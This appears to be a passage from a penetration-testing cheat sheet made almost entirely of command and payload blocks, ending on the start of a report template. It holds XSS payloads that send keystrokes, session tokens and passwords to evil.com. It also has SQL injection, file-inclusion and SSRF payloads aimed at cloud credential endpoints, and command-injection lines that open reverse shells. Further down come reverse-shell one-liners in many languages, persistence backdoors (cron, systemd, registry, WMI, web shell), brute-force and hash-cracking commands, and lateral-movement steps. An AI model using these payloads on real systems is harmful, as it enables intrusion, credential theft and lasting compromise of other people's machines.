fetch('https://evil.com/keylog?key='+e.key);
}
</script><!-- Steal session token from localStorage -->
<script>fetch('https://evil.com/steal?token='+localStorage.getItem('token'))</script>
<!-- Auto-submit form with captured session -->
<script>
var token = localStorage.getItem('token');
document.write('<img src="https://evil.com/steal?token='+token+'">');
</script><!-- Replace page content -->
<script>
document.body.innerHTML = '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999"><h1>Session Expired</h1><form method="POST" action="https://evil.com/steal"><input type="password" name="pass"><input type="submit"></form></div>';
</script><script>
for (var i=1;i<=1024;i++) {
var img = new Image();
img.onload = function() { console.log('Port open: ' + i); };
img.onerror = function() { console.log('Port closed: ' + i); };
img.src = 'http://localhost:' + i;
}
</script># Basic scan
dalfox url https://target.com/page?q=test
# File input
dalfox file urls.txt
# With cookie
dalfox url https://target.com/page?q=test --cookie "session=abc123"
# Blind XSS
dalfox url https://target.com/page?q=test --blind "https://xsshunter.com"
# Output formats
dalfox url https://target.com/page?q=test --output results.txt --format json
# Custom payloads
dalfox url https://target.com/page?q=test --custom-payload-file payloads.txt# Basic scan
python3 xsstrike.py -u "https://target.com/page?q=test"
# POST request
python3 xsstrike.py -u "https://target.com/search" --data "q=test"
# Crawl and test
python3 xsstrike.py -u "https://target.com" --crawl
# Skip DOM checking
python3 xsstrike.py -u "https://target.com/page?q=test" --skip-dom# Basic scan
xsser -u "https://target.com/page?q=test"
# POST request
xsser -u "https://target.com/login" --post="user=test&pass=test"
# Auto
xsser --auto "https://target.com/page?q=test"
# Crawler
xsser --crawler "https://target.com"<!-- Mixed case -->
<ScRiPt>alert(1)</ScRiPt>
<!-- Comments -->
<scri<!--test-->pt>alert(1)</sc<!--test-->ript>
<!-- Newlines -->
<script>
alert(1)
</script>
<!-- Tabs and spaces -->
< script >alert(1)</ script >
<!-- URL encoding -->
%3cscript%3ealert(1)%3c/script%3e
<!-- Double encoding -->
%253cscript%253ealert(1)%253c/script%253e
<!-- UTF-7 -->
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
<!-- Data URI -->
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<!-- Unicode -->
<ſcript>alert(1)</ſcript><!-- If unsafe-inline is allowed -->
<script>alert(1)</script>
<!-- If script-src includes unsafe-eval -->
<script>eval('alert(1)')</script>
<!-- JSONP callback -->
<script src="https://target.com/jsonp?callback=alert(1)"></script>
<!-- Base tag redirection -->
<base href="https://evil.com">
<script src="malicious.js"></script>
<!-- Iframe with javascript -->
<iframe src="javascript:alert(1)"></iframe># HTTP POST form
hydra -l admin -P rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
# HTTP GET with basic auth
hydra -L users.txt -P pass.txt target.com http-get /protected
# HTTPS POST
hydra -l admin -P pass.txt -s 443 target.com https-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
# With cookies
hydra -l admin -P pass.txt target.com http-post-form "/login:username=^USER^&password=^PASS^&cookie=value:H=session=abc123:F=Invalid"
# Multiple threads
hydra -L users.txt -P pass.txt -t 16 target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
# Output
hydra -L users.txt -P pass.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:Invalid" -o results.txt
# SSH
hydra -L users.txt -P pass.txt ssh://target.com
# FTP
hydra -l admin -P pass.txt ftp://target.com
# SMTP
hydra -l admin@target.com -P pass.txt smtp://target.com
# MySQL
hydra -l root -P pass.txt mysql://target.com
# RDP
hydra -L users.txt -P pass.txt rdp://target.com
# SMB
hydra -L users.txt -P pass.txt smb://target.com# HTTP
medusa -h target.com -U users.txt -P pass.txt -M http -m DIR:/login -T 10
# SSH
medusa -h target.com -U users.txt -P pass.txt -M ssh -T 4
# FTP
medusa -h target.com -U users.txt -P pass.txt -M ftp
# MySQL
medusa -h target.com -U users.txt -P pass.txt -M mysql# HTTP POST
patator http_fuzz url=https://target.com/login method=POST body='user=FILE0&pass=FILE1' 0=users.txt 1=pass.txt -x ignore:fgrep='Invalid'
# FTP
patator ftp_login host=target.com user=FILE0 password=FILE1 0=users.txt 1=pass.txt -x ignore:mesg='Login incorrect'
# SSH
patator ssh_login host=target.com user=FILE0 password=FILE1 0=users.txt 1=pass.txt -x ignore:mesg='Authentication failed'# Identify hash type
hashid hash.txt
hash-identifier hash# MD5
hashcat -m 0 hash.txt rockyou.txt
# SHA1
hashcat -m 100 hash.txt rockyou.txt
# SHA256
hashcat -m 1400 hash.txt rockyou.txt
# SHA512
hashcat -m 1800 hash.txt rockyou.txt
# NTLM
hashcat -m 1000 hash.txt rockyou.txt
# bcrypt
hashcat -m 3200 hash.txt rockyou.txt
# WordPress
hashcat -m 400 hash.txt rockyou.txt
# Joomla
hashcat -m 400 hash.txt rockyou.txt
# Drupal
hashcat -m 7900 hash.txt rockyou.txt# Straight (wordlist)
hashcat -a 0 -m 0 hash.txt rockyou.txt
# Combination
hashcat -a 1 -m 0 hash.txt wordlist1.txt wordlist2.txt
# Mask attack (brute force)
hashcat -a 3 -m 0 hash.txt ?l?l?l?l?l?l?l?l
# Hybrid wordlist + mask
hashcat -a 6 -m 0 hash.txt rockyou.txt ?d?d?d
# Hybrid mask + wordlist
hashcat -a 7 -m 0 hash.txt ?d?d?d rockyou.txt
# Rule-based
hashcat -a 0 -m 0 hash.txt rockyou.txt -r best64.rule# Common masks
?l = lowercase (a-z)
?u = uppercase (A-Z)
?d = digits (0-9)
?s = special (!@#$%^&*)
?a = all (l,u,d,s)
?b = binary (0x00-0xff)
# Examples
?l?l?l?l?l = 5 lowercase
?u?l?l?l?d?d = Capital + 3 lowercase + 2 digits
?d?d?d?d?d?d = 6 digits
?a?a?a?a?a?a = 6 any characters
# Built-in rules
/usr/share/hashcat/rules/best64.rule
/usr/share/hashcat/rules/d3ad0ne.rule
/usr/share/hashcat/rules/OneRuleToRuleThemAll.rule# Basic crack
john --wordlist=rockyou.txt hash.txt
# With format
john --format=raw-md5 --wordlist=rockyou.txt hash.txt
# Show results
john --show hash.txt
# Single crack mode
john --single hash.txt
# Incremental (brute force)
john --incremental hash.txt
# Rules
john --wordlist=rockyou.txt --rules hash.txt
# Shadow file
unshadow passwd shadow > combined.txt
john --wordlist=rockyou.txt combined.txt
# SSH private key
ssh2john id_rsa > id_rsa.hash
john --wordlist=rockyou.txt id_rsa.hashadmin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' UNION SELECT 1,'admin','password'--
' UNION SELECT NULL,NULL,NULL--# Change user ID
GET /profile?user_id=1
GET /profile?user_id=2
# Change role parameter
POST /admin
role=user → role=admin
# Boolean parameters
isAdmin=false → isAdmin=true
admin=0 → admin=1
# Array parameters
user_ids[]=1 → user_ids[]=2# Decode JWT
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c" | base64 -d
# JWT tool
jwt_tool token.jwt -T
# Change algorithm to none
jwt_tool token.jwt -X a
# Brute force secret
jwt_tool token.jwt -C -d rockyou.txt
# Kid injection
jwt_tool token.jwt -I -hc kid -hv "../../../dev/null"# Redirect URI manipulation
https://target.com/oauth/callback?code=xxx&state=yyy
https://evil.com/oauth/callback?code=xxx&state=yyy
# CSRF on OAuth
<img src="https://target.com/oauth/authorize?response_type=code&client_id=123&redirect_uri=https://evil.com">
# Scope escalation
scope=read → scope=read+write# Set session before login
GET /login?PHPSESSID=attacker_session
# After login, same session ID is authenticated
GET /profile HTTP/1.1
Cookie: PHPSESSID=attacker_session# Response manipulation
HTTP/1.1 302 Found
Location: /2fa
# Change to:
HTTP/1.1 302 Found
Location: /dashboard
# Parameter tampering
2fa=123456 → 2fa=000000
# Null parameter
2fa=123456 → 2fa=
# OTP reuse# Directory traversal
https://target.com/page?file=../../etc/passwd
https://target.com/page?file=..\..\..\windows\win.ini
# URL encoded
https://target.com/page?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd
https://target.com/page?file=..%252f..%252fetc%252fpasswd
# Double encoding
https://target.com/page?file=%25%32%65%25%32%65%25%32%66etc%25%32%66passwdhttps://target.com/page?file=../../etc/passwd%00
https://target.com/page?file=../../etc/passwd%00.phphttps://target.com/page?file=../../../../etc/passwd......................
https://target.com/page?file=../../../../etc/passwd////////////////////# PHP filter wrapper (read source)
https://target.com/page?file=php://filter/convert.base64-encode/resource=index.php
https://target.com/page?file=php://filter/convert.base64-encode/resource=../../../../etc/passwd
# PHP input wrapper (execute code)
POST /page?file=php://input HTTP/1.1
Content-Type: application/x-www-form-urlencoded
<?php system('id'); ?>
# PHP expect wrapper (if enabled)
https://target.com/page?file=expect://id
# Data wrapper
https://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+
# File wrapper
https://target.com/page?file=file:///etc/passwd
# Zip wrapper
https://target.com/page?file=zip://shell.jpg#shell.php# Basic RFI
https://target.com/page?file=http://evil.com/shell.txt
https://target.com/page?file=https://evil.com/shell.php
https://target.com/page?file=ftp://evil.com/shell.txt
# With URL encoding
https://target.com/page?file=http%3A%2F%2Fevil.com%2Fshell.txt
# PHP wrapper
https://target.com/page?file=php://filter/convert.base64-encode/resource=http://evil.com/shell.php# Apache access log poisoning
# Inject PHP code in User-Agent
curl -A "<?php system('id'); ?>" https://target.com
# Then include log file
https://target.com/page?file=/var/log/apache2/access.log
# SSH log poisoning
ssh '<?php system("id"); ?>'@target.com
https://target.com/page?file=/var/log/auth.log
# Mail log poisoning
telnet target.com 25
MAIL FROM: <?php system('id'); ?>
RCPT TO: victim@localhost
DATA
Subject: test
test
.
https://target.com/page?file=/var/log/mail.log# Proc self/environ poisoning
curl -H "User-Agent: <?php system('id'); ?>" https://target.com
https://target.com/page?file=/proc/self/environ
# Session file poisoning
# First, set session variable
https://target.com/page?file=<?php system('id'); ?>
# Then include session file
https://target.com/page?file=/var/lib/php/sessions/sess_<SESSION_ID>
# Temp file upload (race condition)
# Upload file, then include before cleanup
https://target.com/page?file=/tmp/php<random># Common LFI files
/etc/passwd
/etc/shadow
/etc/hosts
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/var/log/apache2/access.log
/var/log/nginx/access.log
/var/log/auth.log
/var/log/mail.log
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
C:\boot.ini
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts# Localhost access
https://target.com/fetch?url=http://127.0.0.1/
https://target.com/fetch?url=http://localhost/
https://target.com/fetch?url=http://[::1]/
https://target.com/fetch?url=http://0.0.0.0/
# Decimal IP
https://target.com/fetch?url=http://2130706433/ (127.0.0.1)
https://target.com/fetch?url=http://3232235521/ (192.168.0.1)
# Octal IP
https://target.com/fetch?url=http://0177.0.0.1/
https://target.com/fetch?url=http://0x7f.0x0.0x0.0x1/
# Domain tricks
https://target.com/fetch?url=http://localhost.127.0.0.1.nip.io/
https://target.com/fetch?url=http://127.0.0.1.xip.io/# AWS metadata
https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/
https://target.com/fetch?url=http://169.254.169.254/latest/user-data/
https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# GCP metadata
https://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/
https://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
-H "Metadata-Flavor: Google"
# Azure metadata
https://target.com/fetch?url=http://169.254.169.254/metadata/instance?api-version=2017-08-01
-H "Metadata: true"
# Digital Ocean metadata
https://target.com/fetch?url=http://169.254.169.254/metadata/v1.json# Port scan with SSRF
for port in {1..1024}; do
curl -s "https://target.com/fetch?url=http://192.168.1.1:$port" \
| grep -q "Connection refused" || echo "Port $port open"
done
# Discover internal IP ranges
for ip in {1..254}; do
curl -s "https://target.com/fetch?url=http://10.0.0.$ip:80" \
-m 1 | grep -q "Connection refused" || echo "10.0.0.$ip alive"
done# URL encoding
https://target.com/fetch?url=http://%31%32%37%2E%30%2E%30%2E%31/
# Double URL encoding
https://target.com/fetch?url=http://%2531%2532%2537%252E%2530%252E%2530%252E%2531/
# Redirect bypass
# First, set up redirector
https://evil.com/redirect?url=http://127.0.0.1:80
# Then SSRF to redirector
https://target.com/fetch?url=http://evil.com/redirect
# DNS rebinding
# Use dnsrebinder.net
https://target.com/fetch?url=http://127.0.0.1.dnsrebinder.net
# IPv6 bypass
https://target.com/fetch?url=http://[::1]:80/
https://target.com/fetch?url=http://[::ffff:7f00:0001]/
# Alternative localhost representations
127.0.0.0
127.127.127.127
127.0.1.3
2130706433
0x7f000001
0177.0.0.1# Internal Redis
https://target.com/fetch?url=gopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aINFO%0d%0a
# Internal Memcached
https://target.com/fetch?url=gopher://127.0.0.1:11211/_stats
# Internal MySQL
https://target.com/fetch?url=mysql://127.0.0.1:3306/
# Internal Elasticsearch
https://target.com/fetch?url=http://127.0.0.1:9200/_cat/indices
# Internal MongoDB
https://target.com/fetch?url=mongodb://127.0.0.1:27017/# File protocol
https://target.com/fetch?url=file:///etc/passwd
# Dict protocol
https://target.com/fetch?url=dict://127.0.0.1:3306/info
# Gopher protocol
https://target.com/fetch?url=gopher://127.0.0.1:8080/_GET%20/HTTP/1.0%0a%0a
# FTP protocol
https://target.com/fetch?url=ftp://anonymous:anonymous@127.0.0.1:21/
# SFTP protocol
https://target.com/fetch?url=sftp://user:pass@127.0.0.1:22/
# TFTP protocol
https://target.com/fetch?url=tftp://127.0.0.1:69/test# Command separators
; id
| id
|| id
& id
&& id
`id`
$(id)
# URL encoded
%3Bid
%7Cid
%26%26id
# Newline encoded
%0aid# Time-based
; sleep 5
| sleep 5
& ping -c 10 127.0.0.1
&& sleep 5
# Output-based (if output is not returned)
; wget http://evil.com/`whoami`
| curl http://evil.com/$(id)
& nslookup `hostname`.evil.com# Linux
; id
| id
|| id
& id
&& id
`id`
$(id)
; cat /etc/passwd
| nc -e /bin/sh evil.com 4444
& bash -i >& /dev/tcp/evil.com/4444 0>&1
`wget http://evil.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh`
# Windows
& whoami
| dir
& ping -n 5 127.0.0.1
& powershell -c "Invoke-WebRequest -Uri http://evil.com/shell.exe -OutFile C:\shell.exe"# Space bypass
${IFS}id
{cat,/etc/passwd}
cat${IFS}/etc/passwd
cat< /etc/passwd
cat>/etc/passwd
# Character blacklist bypass
c\a\t /etc/passwd
cat /etc/pa??wd
cat /etc/pass*
cat /e'tc'/pa'ss'wd
echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash
# Command substitution
a=id; $a
b=cat; $b /etc/passwd
c="whoami"; eval $c
# Wildcards
/???/?at /???/pass?? (cat /etc/passwd)
/???/n? -e /???/pass?? (nc -e /bin/sh)# PATH manipulation
PATH=/tmp:$PATH evil_binary
# LD_PRELOAD injection
LD_PRELOAD=/tmp/malicious.so vulnerable_binary
# IFS injection
IFS=,;`cat<<<uname,-a`# GET - Retrieve data
curl -X GET https://api.target.com/users/1
# POST - Create data
curl -X POST https://api.target.com/users \
-H "Content-Type: application/json" \
-d '{"name":"test","email":"test@test.com"}'
# PUT - Update data
curl -X PUT https://api.target.com/users/1 \
-H "Content-Type: application/json" \
-d '{"name":"updated"}'
# DELETE - Delete data
curl -X DELETE https://api.target.com/users/1
# PATCH - Partial update
curl -X PATCH https://api.target.com/users/1 \
-H "Content-Type: application/json" \
-d '{"email":"new@test.com"}'
# OPTIONS - Discover methods
curl -X OPTIONS https://api.target.com/users -i# JWT token
curl -H "Authorization: Bearer <token>" https://api.target.com/users
# API key
curl -H "X-API-Key: 123456" https://api.target.com/users
curl "https://api.target.com/users?api_key=123456"
# Basic auth
curl -u username:password https://api.target.com/users
# OAuth2
curl -H "Authorization: Bearer <oauth_token>" https://api.target.com/users# IDOR testing
curl https://api.target.com/users/1
curl https://api.target.com/users/2
curl https://api.target.com/users/1000
# Parameter pollution
curl "https://api.target.com/search?q=test&q=admin"
# JSON injection
curl -X POST https://api.target.com/users \
-H "Content-Type: application/json" \
-d '{"name":"test","role":"admin"}'
# Mass assignment
curl -X PUT https://api.target.com/users/1 \
-H "Content-Type: application/json" \
-d '{"name":"test","isAdmin":true,"balance":999999}'# Get all types
{
__schema {
types {
name
fields {
name
type {
name
kind
}
}
}
}
}
# Get queries
{
__schema {
queryType {
fields {
name
args {
name
type {
name
kind
}
}
}
}
}
}# Basic query
{
user(id: 1) {
name
email
posts {
title
}
}
}
# Mutation
mutation {
createUser(input: {name: "test", email: "test@test.com"}) {
id
name
}
}
# Fragments
fragment UserFields on User {
id
name
email
}
query {
user(id: 1) {
...UserFields
}
}
# Aliases
{
user1: user(id: 1) {
name
}
user2: user(id: 2) {
name
}
}# Deep nested query (DoS)
query {
user(id: 1) {
posts {
comments {
user {
posts {
comments {
user {
posts {
title
}
}
}
}
}
}
}
}
}
# Alias-based attack
query {
a: user(id: 1) { name }
b: user(id: 1) { name }
c: user(id: 1) { name }
# ... repeated many times
}
# Introspection abuse
query {
__schema {
types {
name
fields {
name
type {
name
fields {
name
type {
name
}
}
}
}
}
}
}# Run collections
newman run collection.json -e environment.json
# With data
newman run collection.json -d data.csv
# HTML report
newman run collection.json -r htmlextra# API scan
zap-api-scan.py -t https://target.com/swagger.json -f openapi
# Active scan
zap-api-scan.py -t https://target.com/swagger.json -f openapi -a# API endpoint discovery
kr scan https://target.com -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
# Bruteforce with wordlist
kr brute https://target.com -w /usr/share/seclists/Discovery/Web-Content/common.txt# Basic scan
./testssl.sh https://target.com
# JSON output
./testssl.sh --jsonfile results.json https://target.com
# HTML report
./testssl.sh --htmlfile report.html https://target.com
# Check specific vulnerabilities
./testssl.sh --heartbleed https://target.com
./testssl.sh --poodle https://target.com
./testssl.sh --freak https://target.com
./testssl.sh --logjam https://target.com
./testssl.sh --crime https://target.com
./testssl.sh --breach https://target.com# Basic scan
sslyze target.com
# Check certificates
sslyze --certinfo target.com
# Check protocols
sslyze --tlsv1 --tlsv1_1 --tlsv1_2 --tlsv1_3 target.com
# Check vulnerabilities
sslyze --heartbleed --robot --fallback target.com
# JSON output
sslyze --json_out=results.json target.com# Basic scan
sslscan target.com:443
# Show certificate
sslscan --show-certificate target.com
# Check ciphers
sslscan --no-ciphersuites target.com# OpenSSL connection
openssl s_client -connect target.com:443
openssl s_client -connect target.com:443 -tls1_2
openssl s_client -connect target.com:443 -cipher 'ECDHE-RSA-AES128-GCM-SHA256'
# Certificate details
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -text
# Check expiration
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates
# Check SAN
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -ext subjectAltName
# Supported protocols
nmap --script ssl-enum-ciphers -p 443 target.com# HSTS check
curl -sI https://target.com | grep -i "strict-transport-security"
# CSP check
curl -sI https://target.com | grep -i "content-security-policy"
# HPKP (deprecated)
curl -sI https://target.com | grep -i "public-key-pins"
# Expect-CT
curl -sI https://target.com | grep -i "expect-ct"
# Certificate Transparency
curl -s https://crt.sh/?q=target.com# Heartbleed (CVE-2014-0160)
nmap -p 443 --script ssl-heartbleed target.com
# POODLE (CVE-2014-3566)
nmap -p 443 --script ssl-poodle target.com
# FREAK (CVE-2015-0204)
nmap -p 443 --script ssl-freak target.com
# DROWN (CVE-2016-0800)
nmap -p 443 --script ssl-drown target.com
# ROBOT (CVE-2017-17382)
nmap -p 443 --script ssl-robot target.com
# BEAST (CVE-2011-3389)
# Check if TLS 1.0 is enabled
# CRIME (CVE-2012-4929)
# Check compression
# BREACH (CVE-2013-3587)
# Check HTTP compression# Bash
bash -i >& /dev/tcp/10.10.14.1/4444 0>&1
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PHP
php -r '$s=fsockopen("10.10.14.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Perl
perl -e 'use Socket;$i="10.10.14.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.14.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# Netcat
nc -e /bin/sh 10.10.14.1 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.1 4444 >/tmp/f
# Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet 10.10.14.1 4444 0</tmp/p | /bin/sh 1>/tmp/p
# XTerm
xterm -display 10.10.14.1:1# PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.1/ps.ps1')"
# PowerShell one-liner
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Netcat
nc.exe 10.10.14.1 4444 -e cmd.exe
# msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe
# VB Script
# Create reverse shell VBS script# Linux
nc -lvnp 4444 -e /bin/sh
python -c 'exec("import socket, subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1);s.bind((\"0.0.0.0\",4444));s.listen(1);c,a=s.accept();\nwhile True: d=c.recv(1024); if len(d)==0: break; p=subprocess.Popen(d,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE); o=p.stdout.read()+p.stderr.read(); c.send(o)")'
# Windows
nc.exe -lvnp 4444 -e cmd.exe# Python
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Script
script /dev/null -qc /bin/bash
# Socat
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.1:4444
# After getting shell, background (Ctrl+Z) and:
stty raw -echo; fg
export TERM=xterm
stty rows 40 cols 150# System info
uname -a
cat /etc/os-release
cat /etc/issue
hostname
# User info
id
whoami
sudo -l
cat /etc/passwd
cat /etc/shadow
history
# Process info
ps aux
ps -ef
top -n 1
# Network info
ifconfig
ip a
netstat -an
netstat -tulpn
ss -tulpn
cat /etc/hosts
# File system
find / -perm -4000 2>/dev/null # SUID
find / -perm -2000 2>/dev/null # SGID
find / -writable -type f 2>/dev/null | grep -v proc
find / -name "*.key" -o -name "*.pem" -o -name "*.crt" 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron*
grep "CRON" /var/log/syslog
# Installed software
dpkg -l
rpm -qa
pip list
gem list
npm list -g
# Environment variables
env
cat ~/.bashrc
cat ~/.bash_profile
# Log files
cat /var/log/auth.log
cat /var/log/apache2/access.log
cat /var/log/mysql/error.log
# Config files
find / -name "*.conf" -o -name "*.config" 2>/dev/null# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
# pspy (process monitor)
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64# System info
systeminfo
wmic os get caption,version,buildnumber
wmic computersystem get domain,manufacturer,model,name
# User info
whoami
whoami /priv
whoami /groups
net users
net localgroup administrators
# Process info
tasklist /v
wmic process list full
# Network info
ipconfig /all
netstat -an
route print
arp -a
# File system
dir C:\
dir "C:\Program Files"
dir "C:\Program Files (x86)"
dir C:\Users
dir /s *.config
dir /s *.kdbx
dir /s *.key
# Services
wmic service list brief
sc query
net start
# Installed software
wmic product get name,version,vendor
dir "C:\Program Files"
Get-ChildItem -Path "C:\Program Files" -Recurse
# Scheduled tasks
schtasks /query /fo LIST /v
Get-ScheduledTask
# Registry
reg query HKLM /f "password" /t REG_SZ /s
reg query HKCU /f "password" /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"# WinPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe
.\winPEASany.exe
# PowerUp
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks
# Sherlock
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
Find-AllVulns
# Windows Exploit Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt# SSH key
mkdir -p ~/.ssh
echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys
# Cron job
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'" > /tmp/cron
crontab /tmp/cron
# Systemd service
cat > /etc/systemd/system/persistence.service << EOF
[Unit]
Description=Persistence
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable persistence.service
systemctl start persistence.service
# .bashrc
echo 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1 &' >> ~/.bashrc
# Web shell
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php# Registry
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "Backdoor" -Value "C:\shell.exe"
# Scheduled task
schtasks /create /tn "Backdoor" /tr "C:\shell.exe" /sc onlogon /ru SYSTEM
# Startup folder
copy shell.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
# WMI persistence
$filter = ([wmiclass]"\\.\root\subscription:__EventFilter").CreateInstance()
$filter.QueryLanguage = "WQL"
$filter.Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$filter.Name = "Backdoor"
$filter.EventNamespace = 'root\cimv2'
$result = $filter.Put()
$consumer = ([wmiclass]"\\.\root\subscription:CommandLineEventConsumer").CreateInstance()
$consumer.Name = 'BackdoorConsumer'
$consumer.CommandLineTemplate = "C:\shell.exe"
$result = $consumer.Put()
# Service
sc.exe create Backdoor binPath= "C:\shell.exe" start= auto
sc.exe start Backdoor# SSH key stealing
find / -name "id_rsa" 2>/dev/null
cat ~/.ssh/id_rsa
# SSH agent forwarding
ssh -A user@target.com
# SSH tunneling
ssh -L 8080:localhost:80 user@target.com # Local forward
ssh -R 8080:localhost:80 user@target.com # Remote forward
ssh -D 1080 user@target.com # Dynamic proxy# PSExec
.\PsExec.exe \\target -u user -p pass cmd.exe
# WinRM
Enter-PSSession -ComputerName target -Credential $cred
Invoke-Command -ComputerName target -ScriptBlock {whoami} -Credential $cred
# WMI
wmic /node:target /user:user /password:pass process call create "cmd.exe"
# SMB
net use \\target\c$ /user:user pass
copy shell.exe \\target\c$\Windows\Temp\# Local port forwarding
ssh -L 8080:internal-server:80 user@pivot-host
# Remote port forwarding
ssh -R 8080:localhost:80 user@pivot-host
# Dynamic SOCKS proxy
ssh -D 1080 user@pivot-host
# SSH tunneling with ProxyCommand
ssh -o ProxyCommand="ssh -W %h:%p user@pivot-host" target# Using proxychains
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT -Pn target
# Using chisel
# Server (attacker)
./chisel server -p 8000 --reverse
# Client (pivot)
./chisel client attacker:8000 R:socks
# Using EarthWorm
./ew -s ssocksd -l 1080# Linux
# SSH forwarding
ssh -L 8080:localhost:80 user@pivot
# Netcat forwarding
mkfifo /tmp/fifo
nc -l -p 8080 < /tmp/fifo | nc target 80 > /tmp/fifo
# Socat forwarding
socat TCP-LISTEN:8080,fork TCP:target:80
# Windows
# netsh port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=targetEXECUTIVE SUMMARY
=================
- Overview of engagement
- Key findings (high-level)
- Risk ratings
- Business impact
- Strategic recommendations
- Scope and methodology summary
TECHNICAL FINDINGS
==================
Finding #1: [Title]
- Severity: Critical/High/Medium/Low/Info
- CVSS Score: X.X (Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
